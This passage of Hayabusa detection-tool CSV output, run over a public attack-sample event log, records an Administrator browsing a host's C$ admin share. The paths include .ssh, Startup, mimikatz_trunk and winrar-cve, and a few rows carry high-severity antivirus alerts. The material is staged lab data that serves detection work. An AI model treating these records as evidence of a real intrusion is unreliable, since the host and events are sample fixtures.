+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | 
IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\Sample Pictures | IP Addr: 
